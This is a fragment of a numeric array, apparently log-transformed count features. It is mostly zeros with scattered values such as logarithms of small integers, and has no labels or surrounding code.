0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0, 0, 0, 0.0, 0.0, 0.0, \n 0.0, 0, 0.0, 0.0, 0, 0.0, 0, 0.0, 5.101797476893978, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 5.723585101952381, 0.0, 0.0, 0.0, 0.0, 0, 0, 0, 0.0, 0.0,\n 0.0, 0, 0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0,\n 0.0, 0.0, 0, 0, 0.0, 0, 0.0, 0, 0.0, 0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, \n 0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 1.791759469228055, 0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 5.723585101952381, \n 5.723585101952381, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0,\n 0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0,\n 0.0, 0.0, 0, 0, 0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0, 0.0, \n 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 1.9459101490553132, 0, 1.0986122886681098, 0.0, 0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 2.8903717578961645, 0.0,\n 0.0, 0.0, 0.0, 1.0986122886681098, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, \n 2.1972245773362196, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, \n 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 5.723585101952381, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.6931471805599453,\n 0.0, 0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0,\n 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0, 0.0, \n 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, \n 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, \n 0.0, 0.0, 0.0, 0, 0, 0, 0, 0, 0.0, 0, 0, 0, 0, 0.0, 0.0, 0.0, 0, 0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, \n 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0,\n 0, 0.0, 0, 0.0, 0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 3.0841946160253877, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0, 0.0, \n 0.0, 0.0, 0.0, 0, 0.0, 0, 4.795790545596741, 0.0, 0.0, 0, 0, 0, 0.0, \n 0.0, 0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0,\n 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, \n 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 3.5263605246161616, \n 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0, 3.044522437723423, 0.0, 0, 0.0, 0.0, 0.0, 4.74493212836325, 0, \n 0.0, 0, 0.0, 0.0, 0.0, 0, 0, 0.0, 1.6094379124341003, 0.0, 0.0, 0.0, \n 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0, 6.516193076042964, \n 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 1.6094379124341003, 0.0, 0.0, \n 1.7412592803704001, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0, 0.0, 0, 0, 3.2958368660043296, 0.0, 3.58351893845611, 0, 0.0, 0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 4.51085950651685, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, \n 0.0, 5.952096120109145, 0.0, 5.58914919554, 0.0, 0.0, 0.0, 0.0, 0.0, \n 2.8398715690385097, 0, 0, 0, 0.0, 1.3862943611198906, 3.258096538021482,\n 0, 0.0, 0.0, 0.0, 4.394449154672439, 0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 3.0841946160253872, 5.101797476893978, 0.0, 2.302585092994046, 0, 0, \n 0.0, 4.292158018817389, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0, 1.9459101490553132, 0.0, 0, 0.0, 3.3322045101752034, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, \n 0.0, 0.0, 0.0, 3.9512437185814275, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0, \n 0.0, 0.6931471805599453, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0,\n 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, \n 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0, 0.0, 0.0, 0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, \n 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 3.295836866004329, 4.06534854782536, 0.0, 0.0, 0.0, 0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 3.2188758248682006, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0,\n 0.0, 0, 0, 0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0, 0.0,\n 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0,\n 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0, 0.0, 0.0, 3.295836866004329, 0.0, 0, 0.0, 0, 0.0, 0.0, 0, \n 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, \n 0.0, 0.0, 0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, \n 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 1.791759469228055, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0,\n 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, \n 2.550898738446989, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, \n 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0,\n 0.0, 0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0, \n 0.0, 0.0, 0.0, 0, 0.0, 0, 0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0, 0.0, 0.0, 0.0, 0, 0, 0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0, 0.0, 0.0, \n 2.9957322735539913, 0.0, 0.0, 0.0, 0, 0.0, 0, 0, 0.0, 0.0, 0, 0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0,\n 0, 1.0986122886681098, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0, 0, 0, 0.0, 0, 3.5553480614894135, 0.0,\n 0, 2.5649493574615367, 0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, \n 0.0, 0.0, 0.0, 0, 0.0, 5.46286043483228, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, \n 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 3.6375861597263857, 0.0, 0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, \n 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 4.605170185988092, 0.0, 0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 18.767037148656488, 0.0, 0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, \n 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 2.3978952727983707, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 1.3862943611198906, 0.0, \n 0, 0.0, 0.0, 1.3862943611198906, 0.0, 2.8398715690385097, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 4.584967478670572, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 2.1972245773362196, 0.0, 0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, \n 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 1.791759469228055, 0.0, 0.0, 0.0, 0, 0.0,\n 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0,\n 0, 0.0, 0.0, 3.2188758248682006, 0.0, 0, 0, 0.0, 0, 0.0, 0.0, 0, 0.0, \n 0.0, 0.0, 0, 0.0, 2.550898738446989, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 2.1972245773362196, 0.0, 0.0, \n 0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0, 0.0, 0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, \n 0.0, 4.0943445622221, 0, 0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 6.711235389328078, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0,\n 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0,\n 0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, \n 0.0, 0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 1.3862943611198906,\n 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 3.367295829986474, 0, 0.0, 0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, \n 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, \n 2.8398715690385097, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, \n 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, \n 1.0986122886681098, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, \n 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 